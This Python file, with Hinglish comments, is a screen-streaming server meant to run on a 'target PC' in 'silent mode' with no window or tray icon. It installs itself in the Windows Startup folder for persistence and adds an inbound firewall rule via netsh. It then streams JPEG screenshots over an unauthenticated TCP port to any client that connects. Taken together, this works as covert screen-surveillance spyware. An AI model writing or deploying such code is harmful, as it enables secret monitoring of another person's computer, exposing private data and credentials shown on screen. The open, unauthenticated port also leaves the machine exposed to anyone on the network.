"""
server.py - Target PC par chalao
Screen capture karke LAN pe stream karta hai
Silent mode - koi window nahi, koi tray icon nahi
"""

import socket
import struct
import time
import subprocess
import mss
import numpy as np
import cv2
import sys
import os
import threading
import json
import ctypes

# ============ SETTINGS ============
PORT = 9999          # Port number (client mein bhi same hona chahiye)
FPS = 15             # Frames per second
QUALITY = 85        # JPEG quality (1-100) - zyada = better quality, zyada bandwidth
MONITOR = 1          # 1 = primary screen, 2 = secondary screen
# ==================================



def get_app_path():
    if getattr(sys, 'frozen', False):
        return sys.executable
    return os.path.abspath(__file__)


def ensure_startup_entry():
    """Add a per-user Windows Startup entry so the server launches after login."""
    if os.name != 'nt':
        return

    try:
        appdata = os.environ.get('APPDATA')
        if not appdata:
            return

        startup_dir = os.path.join(appdata, 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
        os.makedirs(startup_dir, exist_ok=True)

        target_path = get_app_path()
        startup_bat = os.path.join(startup_dir, 'ScreenMirrorServer.bat')

        if getattr(sys, 'frozen', False):
            launch_line = f'"{target_path}"'
        else:
            launch_line = f'"{sys.executable}" "{target_path}"'

        content = (
            '@echo off\r\n'
            'rem Auto-generated by ScreenMirror server\r\n'
            f'start "" /min {launch_line}\r\n'
        )

        current = None
        if os.path.exists(startup_bat):
            try:
                with open(startup_bat, 'r', encoding='utf-8') as f:
                    current = f.read()
            except Exception:
                current = None

        if current != content:
            with open(startup_bat, 'w', encoding='utf-8', newline='\r\n') as f:
                f.write(content)
            log(f'Startup entry ready: {startup_bat}')
    except Exception as e:
        log(f'Startup setup skipped: {e}')


def ensure_firewall_rule():
    """Windows firewall mein port allow rule add karo (best effort)."""
    if os.name != 'nt':
        return

    try:
        check = subprocess.run(
            [
                'netsh', 'advfirewall', 'firewall', 'show', 'rule',
                'name=ScreenMirror'
            ],
            capture_output=True,
            text=True,
            timeout=5
        )

        # Rule agar already hai to dobara add karne ki zarurat nahi.
        if 'No rules match' not in (check.stdout + check.stderr):
            log('Firewall rule already exists: ScreenMirror')
            return

        add = subprocess.run(
            [
                'netsh', 'advfirewall', 'firewall', 'add', 'rule',
                'name=ScreenMirror', 'dir=in', 'action=allow',
                'protocol=TCP', f'localport={PORT}'
            ],
            capture_output=True,
            text=True,
            timeout=8
        )

        if add.returncode == 0:
            log(f'Firewall rule added: ScreenMirror TCP {PORT}')
        else:
            log(f'Firewall rule add failed (run as admin): {add.stdout} {add.stderr}')
    except Exception as e:
        log(f'Firewall setup skipped: {e}')

def capture_and_stream():
    server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    
    try:
        server_sock.bind(('0.0.0.0', PORT))
        server_sock.listen(1)
        server_sock.settimeout(5.0)
    except OSError as e:
        log(f"Port {PORT} bind error: {e}")
        sys.exit(1)

    log(f"Listening on port {PORT}...")

    with mss.MSS() as sct:
        monitor = sct.monitors[MONITOR]
        
        while True:
            try:
                conn, addr = server_sock.accept()
                log(f"Client connected: {addr[0]}")
                conn.settimeout(10.0)
                stream_to_client(conn, sct, monitor)
            except socket.timeout:
                continue
            except Exception as e:
                log(f"Connection error: {e}")
                time.sleep(1)

def stream_to_client(conn, sct, monitor):
    frame_time = 1.0 / FPS
    
    try:
        while True:
            t_start = time.time()
            
            # Screen capture
            img = np.array(sct.grab(monitor))
            img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)
            
            # JPEG encode
            _, buf = cv2.imencode('.jpg', img, [cv2.IMWRITE_JPEG_QUALITY, QUALITY])
            data = buf.tobytes()
            
            # Size pehle bhejo (4 bytes), phir image data
            size = struct.pack('>I', len(data))
            conn.sendall(size + data)
            
            # FPS control
            elapsed = time.time() - t_start
            sleep_time = frame_time - elapsed
            if sleep_time > 0:
                time.sleep(sleep_time)
                
    except (ConnectionResetError, BrokenPipeError, socket.timeout):
        log("Client disconnected")
    except Exception as e:
        log(f"Stream error: {e}")
    finally:
        conn.close()

def log(msg):
    # Log file mein likhta hai (background mode mein console nahi hota)
    log_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'server.log')
    timestamp = time.strftime('%Y-%m-%d %H:%M:%S')
    try:
        with open(log_path, 'a') as f:
            f.write(f"[{timestamp}] {msg}\n")
    except:
        pass

if __name__ == '__main__':
    log("Server started")
    ensure_startup_entry()
    ensure_firewall_rule()
    capture_and_stream()